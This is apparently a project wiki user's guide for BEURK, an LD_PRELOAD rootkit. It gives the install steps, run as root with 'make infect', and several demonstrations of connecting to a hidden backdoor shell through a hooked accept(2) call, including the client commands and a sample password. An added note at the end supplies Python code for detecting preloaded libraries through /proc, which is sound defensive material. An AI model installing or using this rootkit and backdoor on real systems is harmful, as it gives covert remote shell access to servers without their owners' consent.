Michael Zapata edited this page Nov 20, 2015 · 5 revisions

User's Guide

This guide provides a step-by-step set of instructions for using BEURK.


Installing BEURK

su -
git clone [email protected]:unix-thrust/beurk.git
cd beurk
make && make infect

Enjoy!!


Connecting to the backdoor

Requirements

The remote backdoor's gateway passes through a hooked accept(2) syscall, so an infected process must be listening on a port (for example ssh, or a web server) before you can connect to it.

The backdoor only opens if the bound port is within the LOW_BACKDOOR_PORT/HIGH_BACKDOOR_PORT range. Otherwise, it ignores the connection request.

socat-client

A small socat-based client is available at /utils/socat-client.sh to ease shell connection.

Demonstration:

beurk@server:~/beurk$ LD_PRELOAD=./libselinux.so python -m SimpleHTTPServer 3005
Serving HTTP on 0.0.0.0 port 3005 ...
beurk@client:~/beurk$ ./utils/socat-client.sh 127.0.0.1:3005 64835
BEURK password:
Welcome to BEURK's hidden shell ...
beurk@server:~/beurk$ ls
CONTRIBUTING.md  TODO.md     includes       src    x.py
LICENSE      beurk.conf  installer.sh   tests
README.md    build       libselinux.so  utils
beurk@server:~/beurk$ exit
logout
beurk@client:~/beurk$

python-client

A client is available at /client.py to ease shell connection.

Demonstration:

beurk@server:~/beurk$ LD_PRELOAD=./libselinux.so python -m SimpleHTTPServer 3005
Serving HTTP on 0.0.0.0 port 3005 ...

Usage:

beurk@client:~/beurk$ ./client.py
./client.py <address> <port> <bind_port> [password] [batch_file]
beurk@client:~/beurk$

Connection:

beurk@client:~/beurk$ ./client.py 127.0.0.1 3005 64835
beurk@client:~/beurk$ ./client.py 127.0.0.1 3005 64835
password:
Welcome to BEURK's hidden shell ...
beurk@server:/home/vagrant/beurk$ ls
CONTRIBUTING.md  README.md   includes	    reconfigure  utils
LICENSE		 TODO.md     libselinux.so  src
Makefile	 beurk.conf  obj	    tests
beurk@server:/home/vagrant/beurk$ exit
logout
beurk@client:~/beurk$

Connection with the argument password:

beurk@client:~/beurk$ ./client.py 127.0.0.1 3005 64835 b3urkR0cks

Welcome to BEURK's hidden shell ...
beurk@server:/home/vagrant/beurk$ ls
CONTRIBUTING.md  README.md   includes	    reconfigure  utils
LICENSE		 TODO.md     libselinux.so  src
Makefile	 beurk.conf  obj	    tests
beurk@server:/home/vagrant/beurk$ exit
logout
beurk@client:~/beurk$

Connection with a batch:

beurk@client:~/beurk$ cat batch.txt
ls
echo "i am a batch"
exit
beurk@client:~/beurk$ ./client.py 127.0.0.1 3005 64835 b3urkR0cks batch.txt
beurk@vagrant:/home/vagrant/beurk$ ls
CONTRIBUTING.md  README.md  beurk.conf	   obj		tests
LICENSE		 TODO.md    includes	   reconfigure	utils
Makefile	 batch.txt  libselinux.so  src
beurk@server:/home/vagrant/beurk$ echo "i am a batch"
i am a batch
beurk@server:/home/vagrant/beurk$ exit
logout
beurk@client:~/beurk$
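
Detection note (an added example, not part of BEURK or of this guide's own code): the demonstrations above start the listening server with LD_PRELOAD=./libselinux.so, which leaves traces in /proc/<pid>/environ and /proc/<pid>/maps that a defender can check. The trusted directory list, the function names and the sample data below are assumptions constructed for illustration.

```python
import os

# Assumption: directories the distribution installs shared objects into.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

def preload_entries(environ: bytes) -> list:
    """LD_PRELOAD entries (space- or colon-separated) from raw /proc/<pid>/environ."""
    for var in environ.split(b"\0"):
        name, _, value = var.partition(b"=")
        if name == b"LD_PRELOAD":
            return value.decode(errors="replace").replace(":", " ").split()
    return []

def untrusted_objects(maps: str) -> set:
    """Executable mappings of .so files that live outside TRUSTED_LIB_DIRS."""
    found = set()
    for line in maps.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 6 or not fields[5].startswith("/"):
            continue  # anonymous or pseudo mapping such as [stack]
        perms, path = fields[1], fields[5]
        if "x" in perms and ".so" in os.path.basename(path) \
                and not path.startswith(TRUSTED_LIB_DIRS):
            found.add(path)
    return found

def inspect(pid: str, environ: bytes, maps: str) -> list:
    """Readable findings for one process: preload variable first, then mappings."""
    out = [f"{pid}: LD_PRELOAD={lib}" for lib in preload_entries(environ)]
    return out + [f"{pid}: executable mapping of {p}" for p in sorted(untrusted_objects(maps))]

def scan_proc() -> list:
    """Run inspect() over every process the caller is allowed to read."""
    findings = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/environ", "rb") as e, open(f"/proc/{pid}/maps") as m:
                findings += inspect(pid, e.read(), m.read())
        except OSError:
            continue  # process exited or access denied
    return findings

# Constructed sample data modelled on the demonstration above (not real output).
SAMPLE_ENVIRON = b"HOME=/home/beurk\0LD_PRELOAD=./libselinux.so\0PATH=/usr/bin\0"
SAMPLE_MAPS = """\
7f1c2a000000-7f1c2a005000 r-xp 00000000 08:01 2222 /home/beurk/beurk/libselinux.so
7f1c2b000000-7f1c2b1c0000 r-xp 00000000 08:01 3333 /lib/x86_64-linux-gnu/libc-2.19.so
7ffd5e000000-7ffd5e021000 rw-p 00000000 00:00 0 [stack]
"""
```

/proc/<pid>/environ shows the environment as it was at exec time and can be overwritten by the process itself, so the maps check is the more reliable of the two signals.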